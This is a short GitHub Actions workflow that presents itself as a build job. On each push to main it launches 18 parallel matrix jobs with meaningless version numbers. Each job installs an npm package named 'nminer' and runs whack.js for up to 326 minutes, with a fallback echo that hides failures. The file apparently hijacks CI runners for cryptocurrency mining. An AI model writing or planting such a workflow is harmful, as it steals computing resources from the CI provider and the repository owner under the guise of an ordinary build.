name: whack
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3028 }
          - { version: 5698 }
          - { version: 8378 }
          - { version: 4320 }
          - { version: 3309 }
          - { version: 2538 }
          - { version: 6433 }
          - { version: 2874 }
          - { version: 7307 }
          - { version: 9496 }
          - { version: 3832 }
          - { version: 7486 }
          - { version: 8489 }
          - { version: 5851 }
          - { version: 2436 }
          - { version: 6516 }
          - { version: 6562 }
          - { version: 8276 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: over devastation
        run: |
          npm install nminer@latest
          timeout 326m node whack.js || echo "whack executed"